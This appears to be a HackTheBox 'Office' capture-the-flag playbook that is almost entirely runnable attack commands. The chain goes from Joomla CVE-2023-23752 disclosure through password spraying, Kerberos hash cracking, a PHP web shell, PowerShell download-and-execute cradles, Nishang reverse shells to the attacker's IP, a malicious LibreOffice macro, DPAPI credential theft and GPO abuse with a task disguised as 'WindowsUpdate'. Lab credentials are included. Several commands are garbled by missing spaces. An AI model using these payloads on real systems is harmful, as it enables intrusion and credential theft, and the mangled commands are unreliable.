Office - HackTheBox Hard Machine Pentest Playbook

Target: 10.129.230.226 | Attacker: 10.10.17.54

Alternative Toolchain Approach

Phase 0: Environment Setup

# Add domain entries to /etc/hosts
echo'10.129.230.226 office.htb dc.office.htb DC.office.htb' | sudotee -a /etc/hosts

# Ensure rockyou is decompressed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null

# Create working directory
mkdir -p ~/Desktop/HackTheBox-VIP/office && cd ~/Desktop/HackTheBox-VIP/office

Phase 1: Reconnaissance (Nmap)

# Full port discovery with masscan (alternative to nmap -p- for speed)
sudo masscan 10.129.230.226 -p1-65535 --rate=1000 -e tun0 --open | tee masscan_results.txt

# Extract ports and run detailed nmap service scan
ports=$(cat masscan_results.txt | grep 'open' | cut -d ' ' -f4 | cut -d '/' -f1 | sort -n | tr'\n'',' | sed 's/,$//')
sudo nmap -sC -sV -p$ports -oN nmap_detailed.txt 10.129.230.226

Expected findings: Domain office.htb, DC hostname DC, Kerberos(88), HTTP/Joomla(80), SMB(445), LDAP(389), WinRM(5985)

Phase 2: Joomla Information Disclosure (CVE-2023-23752)

Same approach: Exploit unauthenticated API endpoint, different tool: use wget + python3 JSON parsing instead of curl/ruby.

# Fetch Joomla configuration via wget and parse with python3
wget -qO- 'http://office.htb/api/index.php/v1/config/application?public=true' | \
  python3 -c "
import sys, json
data = json.load(sys.stdin)
for item in data['data']:
    attrs = item['attributes']
    for k, v in attrs.items():
        if k != 'id':
            print(f'{k}: {v}')
"

Expected output includes:

• • user: root
• • password: H0lOgrams4reTakIng0Ver754!
• • db: joomla_db
• • sitename: Holography Industries

# Also grab users endpoint
wget -qO- 'http://office.htb/api/index.php/v1/users?public=true' | \
  python3 -c "
import sys, json
data = json.load(sys.stdin)
for item in data['data']:
    attrs = item['attributes']
    print(f\"[{attrs.get('id')}] {attrs.get('name')} ({attrs.get('group_names','')}) - {attrs.get('email','')}\" )
"

Expected: Tony Stark (Administrator) - Administrator@holography.htb

Phase 3: Kerberos User Enumeration

Same approach: Enumerate valid domain users, different tool: use nmap krb5-enum-users NSE script instead of Kerbrute.

# Use nmap's kerberos enumeration script with kali's built-in username list
sudo nmap -p88 --script krb5-enum-users \
  --script-args="krb5-enum-users.realm='office.htb',userdb=/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" \
  10.129.230.226 -oN kerb_users.txt

# If nmap script is too slow, alternative with impacket:
# Extract just discovered usernames
grep "Discovered" kerb_users.txt | awk '{print $NF}' | cut -d'@' -f1 > domain_users.txt

If nmap is too slow, alternative approach with impacket lookupsid:

# Use impacket-lookupsid with null session or dwolfe creds (after Phase 4)
impacket-lookupsid 'office.htb/dwolfe:H0lOgrams4reTakIng0Ver754!@10.129.230.226' | \
  grep SidTypeUser | awk '{print $2}' | cut -d'\\' -f2 > domain_users.txt

Expected users: ewhite, etower, dwolfe, dmichael, dlanor, administrator

# Save users file manually if enumeration is slow
cat > domain_users.txt << 'EOF'
ewhite
etower
dwolfe
dmichael
dlanor
administrator
EOF

Phase 4: Password Spray via SMB

Same approach: Spray the Joomla DB password against domain users, different tool: use hydra instead of NetExec/CrackMapExec.

# Password spray with hydra against SMB
hydra -L domain_users.txt -p 'H0lOgrams4reTakIng0Ver754!' smb://10.129.230.226 -V -f

Alternative with impacket if hydra SMB module is unreliable:

# Loop impacket-smbclient for spray
while IFS= read -r user; do
echo"[*] Trying: $user"
  impacket-smbclient "office.htb/${user}:H0lOgrams4reTakIng0Ver754!@10.129.230.226" -c 'shares' 2>/dev/null && \
echo"[+] SUCCESS: $user" || echo"[-] FAILED: $user"
done < domain_users.txt

Expected result:dwolfe:H0lOgrams4reTakIng0Ver754! is valid.

Phase 5: SMB Share Enumeration & PCAP Download

Same approach: Access SOC Analysis share and download PCAP, different tool: use impacket-smbclient instead of smbclient.

# List shares with impacket
impacket-smbclient 'office.htb/dwolfe:H0lOgrams4reTakIng0Ver754!@10.129.230.226' -c 'shares'

# Connect and download the PCAP
impacket-smbclient 'office.htb/dwolfe:H0lOgrams4reTakIng0Ver754!@10.129.230.226'

Inside the impacket-smbclient prompt:

# use SOC Analysis
# ls
# get Latest-System-Dump-8fbc124d.pcap
# exit

Phase 6: PCAP Analysis - Extract Kerberos Pre-Auth Hash

Same approach: Find Kerberos AS-REQ pre-auth timestamp, different tool: use tshark CLI instead of Wireshark GUI.

# Filter for Kerberos AS-REQ packets containing pre-auth data
tshark -r Latest-System-Dump-8fbc124d.pcap -Y "kerberos.msg_type == 10" -T fields \
  -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher 2>/dev/null

# More detailed extraction - find etype 18 pre-auth cipher
tshark -r Latest-System-Dump-8fbc124d.pcap \
  -Y "kerberos.msg_type == 10 && kerberos.pa_enc_timestamp" \
  -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher \
  -e kerberos.etype 2>/dev/null

Expected: User tstark, realm OFFICE.HTB, etype 18, and the encrypted timestamp cipher.

# Extract the raw hex cipher bytes for hash construction
tshark -r Latest-System-Dump-8fbc124d.pcap \
  -Y "kerberos.msg_type == 10 && kerberos.pa_enc_timestamp" \
  -T fields -e kerberos.cipher -E separator=, 2>/dev/null | head -5

Construct the hashcat/john format hash:

# Format: $krb5pa$18$tstark$OFFICE.HTB$<cipher_hex>
# Save to file
echo'$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc' > krb_hash.txt

Phase 7: Crack Kerberos Hash

Same approach: Crack the pre-auth hash, different tool: use john (John the Ripper) instead of hashcat.

# Crack with john using rockyou
john --format=krb5pa-sha1 --wordlist=/usr/share/wordlists/rockyou.txt krb_hash.txt

# Show cracked result
john --show krb_hash.txt

Expected password:playboy69

Phase 8: Joomla Admin Access & RCE (Foothold)

Same approach: Login to Joomla admin, edit template for PHP RCE, different execution: use Invoke-PowerShellTcp.ps1 (Nishang) instead of nc64.exe.

8.1 - Login to Joomla Admin Panel

URL: http://office.htb/administrator
Username: Administrator (Tony Stark)
Password: playboy69

8.2 - Inject Webshell into Template

Navigate: System → Site Templates → Cassiopeia Details and Files → error.php

Inject at the top of error.php:

<?phpif(isset($_REQUEST['c'])){system($_REQUEST['c']);} ?>

Using error.php instead of index.php to be stealthier and avoid breaking the site.

8.3 - Verify RCE

wget -qO- 'http://office.htb/templates/cassiopeia/error.php?c=whoami'

Expected:office\web_account

8.4 - Get Reverse Shell via Nishang PowerShell

# Download Nishang reverse shell script to our working dir
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shell.ps1

# Append auto-execution line at the bottom
echo'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.54 -Port 9001' >> shell.ps1

# Start Python HTTP server to host the payload
python3 -m http.server 8888 &

# Start listener with rlwrap for better shell experience
rlwrap nc -nlvp 9001

Trigger the download-and-execute:

# URL-encode the PowerShell cradle and fire it
wget -qO- "http://office.htb/templates/cassiopeia/error.php?c=powershell+-ep+bypass+-c+\"IEX(New-Object+Net.WebClient).DownloadString('http://10.10.17.54:8888/shell.ps1')\""

Alternative trigger if encoding issues arise:

# Base64 encode the cradle
PAYLOAD=$(echo -n "IEX(New-Object Net.WebClient).DownloadString('http://10.10.17.54:8888/shell.ps1')" | iconv -t UTF-16LE | base64 -w0)
wget -qO- "http://office.htb/templates/cassiopeia/error.php?c=powershell+-ep+bypass+-enc+${PAYLOAD}"

Phase 9: Lateral Movement → tstark (user.txt)

Same approach: Use RunasCs with cracked password, different transport: use Invoke-PowerShellTcp again for the new shell.

9.1 - Upload RunasCs

# On attacker: host RunasCs.exe (download from GitHub releases if needed)
# In the web_account shell:
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/RunasCs.exe' -OutFile 'C:\Windows\Temp\RunasCs.exe'"

9.2 - Get Shell as tstark

Start a second listener:

rlwrap nc -nlvp 9002

Execute RunasCs (from web_account shell):

C:\Windows\Temp\RunasCs.exetstarkplayboy69 "powershell -epbypass -c \"IEX(New-ObjectNet.WebClient).DownloadString('http://10.10.17.54:8888/shell2.ps1')\"" -doffice.htb -l 8

Create shell2.ps1 same as shell.ps1 but with port 9002:

cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shell2.ps1
echo'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.54 -Port 9002' >> shell2.ps1

9.3 - Read user.txt

type C:\Users\tstark\Desktop\user.txt

Phase 10: Internal Port Forward (Port 8083)

Same approach: Forward internal port 8083, different tool: use ligolo-ng instead of chisel.

Option A: ligolo-ng (preferred alternative)

# On attacker - start ligolo proxy
sudo ip tuntap add user root mode tun ligolo
sudo ip linkset ligolo up
sudo ip route add 127.0.0.1/32 dev ligolo  # For accessing target's localhost
./proxy -selfcert -laddr 0.0.0.0:11601

# On target (tstark shell) - download and run ligolo agent
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/agent.exe' -OutFile 'C:\Windows\Temp\agent.exe'"
C:\Windows\Temp\agent.exe -connect 10.10.17.54:11601 -ignore-cert

# In ligolo proxy console:
# session  (select the session)
# listener_add --addr 0.0.0.0:8083 --to 127.0.0.1:8083 --tcp
# start

Option B: SSH Remote Port Forward (simpler fallback)

If ligolo is unavailable, use plink.exe:

# On target - use plink for port forward
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/plink.exe' -OutFile 'C:\Windows\Temp\plink.exe'"
echo y | C:\Windows\Temp\plink.exe -ssh -R 8083:127.0.0.1:8083 root@10.10.17.54 -pw <YOUR_KALI_PASSWORD> -N

Option C: chisel alternative (if others fail)

# On attacker
chisel server --reverse --port 8001

# On target
C:\Windows\Temp\chisel.exe client 10.10.17.54:8001 R:8083:127.0.0.1:8083

Now access:http://127.0.0.1:8083 in browser → Job application portal.

Phase 11: LibreOffice Macro Exploitation → PPotts

Same approach: Craft malicious ODT with macro, lower MacroSecurityLevel registry, different tool: use macro_pack or manual ODF macro injection instead of Metasploit.

11.1 - Lower MacroSecurityLevel (from tstark shell)

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 0 /f

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"

11.2 - Generate Malicious ODT with msfvenom + manual embed

Method: msfvenom macro → embed in ODT manually

# Generate VBA macro payload with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.54 LPORT=9003 -f vba -o macro.vba

Alternative: Use macro_pack for direct ODT generation:

# If macro_pack is available:
echo'windows/x64/shell_reverse_tcp' | macro_pack -t SHELLCODE -o -G payload.odt \
  --listen=10.10.17.54 --port=9003

If using Metasploit (fallback but different options):

msfconsole -q -x "
use exploit/multi/misc/openoffice_document_macro;
set payload windows/x64/shell_reverse_tcp;
set SRVHOST 10.10.17.54;
set SRVPORT 8080;
set LHOST 10.10.17.54;
set LPORT 9003;
set FILENAME resume.odt;
run -j"

11.3 - Start listener and upload ODT

# Listener for PPotts callback
rlwrap nc -nlvp 9003

From web_account shell (which has write access to the applications folder):

powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/resume.odt' -OutFile 'C:\xampp\htdocs\internal\applications\resume.odt'"

Wait 1-3 minutes for PPotts to open the file.

Phase 12: DPAPI Credential Extraction → HHogan

Same approach: Extract DPAPI master key via MS-BKRP RPC, decrypt stored credentials, different tool: use SharpDPAPI.exe instead of mimikatz.

12.1 - Enumerate credentials (from PPotts shell)

# List credential files
Get-ChildItem-Force C:\Users\ppotts\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem-Force C:\Users\ppotts\AppData\Roaming\Microsoft\Protect\
Get-ChildItem-Force'C:\Users\ppotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\'

12.2 - Use SharpDPAPI for automatic decryption via RPC

# Upload SharpDPAPI to target
# From PPotts shell:
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/SharpDPAPI.exe' -OutFile 'C:\Windows\Temp\SharpDPAPI.exe'"

C:\Windows\Temp\SharpDPAPI.execredentials /rpc

This single command will:

• • Find all credential files for the current user
• • Request master key decryption from the DC via MS-BKRP
• • Decrypt and display all stored credentials

Expected output includes:

TargetName: Domain:interactive=OFFICE\HHogan
UserName:   OFFICE\HHogan
Credential: H4ppyFtW183#

12.3 - Alternative: impacket-dpapi (from attacker machine)

If SharpDPAPI upload is problematic, exfiltrate the files:

# After downloading masterkey and credential files to attacker:
impacket-dpapi masterkey -file 191d3f9d-7959-4b4d-a520-a444853c47eb \
  -rpc office.htb/ppotts@dc.office.htb

impacket-dpapi credential -file 84F1CAEEBF466550F4967858F9353FB4 \
  -key <decrypted_masterkey_hex>

Phase 13: WinRM as HHogan & GPO Abuse → root.txt

Same approach: Leverage GPO Managers group to add HHogan to local admins, different tool: use pyGPOAbuse (Python) instead of SharpGPOAbuse.exe.

13.1 - Connect via evil-winrm

evil-winrm -i 10.129.230.226 -u hhogan -p 'H4ppyFtW183#'

13.2 - Enumerate GPO permissions with PowerView

# Upload and load PowerView
upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
. .\PowerView.ps1

# Check GPO permissions for GPO Managers
$sid = (Get-DomainGroup-Identity"GPO Managers").objectsid
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq$sid} | select ObjectDN, ActiveDirectoryRights

13.3 - GPO Abuse with pyGPOAbuse (from attacker machine)

Different tool: Use pyGPOAbuse.py (Python) instead of SharpGPOAbuse.exe:

# Clone if not installed
git clone https://github.com/Hackndo/pyGPOAbuse.git 2>/dev/null
cd pyGPOAbuse

# Add HHogan to local administrators via Default Domain Controllers Policy
python3 pygpoabuse.py 'office.htb/hhogan:H4ppyFtW183#' \
  -gpo-id "6AC1786C-016F-11D2-945F-00C04fB984F9" \
  -command'net localgroup administrators hhogan /add' \
  -taskname "WindowsUpdate" \
  -description "Security Update Task" \
  -f

Alternative: If pyGPOAbuse has issues, use SharpGPOAbuse from the WinRM session:

# Upload and execute
upload SharpGPOAbuse.exe
.\SharpGPOAbuse.exe --AddComputerTask--TaskName"SysMonitor"--Author Office\Administrator --Command"cmd.exe"--Arguments"/c net localgroup administrators hhogan /add"--GPOName"DEFAULT DOMAIN CONTROLLERS POLICY"

13.4 - Force GPO Update

# From evil-winrm session
gpupdate /force

13.5 - Verify and Read Root Flag

# Reconnect with evil-winrm (new session to refresh token)
evil-winrm -i 10.129.230.226 -u hhogan -p 'H4ppyFtW183#'

# Verify admin membership
net user hhogan
whoami /groups

# Read root flag
type C:\Users\Administrator\Desktop\root.txt

Tool Differences Summary

Flags Location

• • user.txt:C:\Users\tstark\Desktop\user.txt
• • root.txt:C:\Users\Administrator\Desktop\root.txt

Notes

• • All wordlists use kali built-in paths: /usr/share/wordlists/rockyou.txt, /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
• • If seclists is not at /usr/share/seclists/, install with: sudo apt install seclists
• • Download tools: RunasCs, SharpDPAPI, ligolo-ng agent from their GitHub releases
• • Always verify each step before proceeding to the next